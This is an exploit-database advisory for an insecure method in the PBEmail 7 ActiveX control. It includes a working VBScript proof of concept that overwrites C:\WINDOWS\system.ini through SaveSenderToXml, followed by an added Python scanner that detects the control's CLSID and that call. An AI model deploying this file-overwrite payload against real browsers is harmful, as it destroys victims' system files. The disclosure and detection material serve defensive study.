vendor: PBEmail 7 ActiveX Edition
by: Katatafish
N/A
CVSS
N/A
Insecure method
CWE
Product Name: PBEmail 7 ActiveX Edition
Affected Version From: PBEmail 7 ActiveX Edition
Affected Version To: PBEmail 7 ActiveX Edition
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 with Internet Explorer 7
2007

Insecure method in PBEmail 7 ActiveX Edition

PBEmail 7 ActiveX Edition exposes an insecure method: the SaveSenderToXml function in PBEmail7Ax.dll, which takes a file path (XmlFilePath) from the caller. This allows an attacker to overwrite arbitrary files on the system, as demonstrated in the script below.

Mitigation:

Update to a patched version of the software, if one is available. Additionally, restrict access to the affected ActiveX component to trusted sources.
Source

Exploit-DB raw data:

<pre>
<b>Found by</b>: Katatafish (karatatata{at}hush{dot}com)
<b>software</b>:PBEmail 7 ActiveX Edition
<b>Vendor:</b> http://www.perfectionbytes.com
<b>vulnerability</b>: Insecure method
SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
<b>Tested on Internet explorer 7 with Windows XP SP 2.</b>
<b>Thanks:</b> str0ke

</pre>

<object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC" 
id="kat"></object>	
<script language="vbscript">
  kat.SaveSenderToXml "C:\WINDOWS\system.ini"
  MyMsg = MsgBox ("Done! Your C:\WINDOWS\system.ini file should now be overwritten.")
</script>

# milw0rm.com [2007-10-12]
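
A content check for the pattern shown above, added here as an example and not part of the original advisory or the Exploit-DB entry: it flags HTML that instantiates the control's CLSID and calls SaveSenderToXml, and reports the literal path argument when one is present. The CLSID and method name come from this page; the class and function names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and method name are taken from the advisory above.
PBEMAIL_CLSID = "30c0fdcb-53be-4db3-869d-32bf2dad0dec"
RISKY_METHOD = "SaveSenderToXml"

class ControlFinder(HTMLParser):
    """Collect ids of <object> tags bound to the CLSID, plus every script body."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            # Accept "clsid:XXXX" in any case, with optional braces or padding.
            clsid = re.sub(r"^\s*clsid:", "", a.get("classid", ""), flags=re.I)
            if clsid.strip(" {}").lower() == PBEMAIL_CLSID:
                self.object_ids.append(a.get("id") or a.get("name") or "")
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan_page(html):
    """Return a list of findings for one HTML document."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    findings = []
    for obj_id in finder.object_ids:
        findings.append({"type": "control_instantiated", "id": obj_id})
        if not obj_id: continue
        # VBScript is case-insensitive and allows a call without parentheses.
        call = re.compile(r"\b%s\s*\.\s*%s\b\s*\(?\s*(?:\"([^\"]*)\"|'([^']*)')?"
                          % (re.escape(obj_id), RISKY_METHOD), re.I)
        for body in finder.scripts:
            for m in call.finditer(body):
                findings.append({"type": "method_call", "id": obj_id,
                                 "path": m.group(1) or m.group(2)})
    return findings

# Constructed sample page (not captured traffic); the path is a harmless placeholder.
SAMPLE = r'''<object classid="CLSID:{30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC}" id="ctl">
</object><script language="vbscript">ctl.SaveSenderToXml "C:\example\out.xml"
</script>'''
```

A `control_instantiated` finding without a matching `method_call` still merits review, since the call can be built dynamically or live in an external script this check does not fetch.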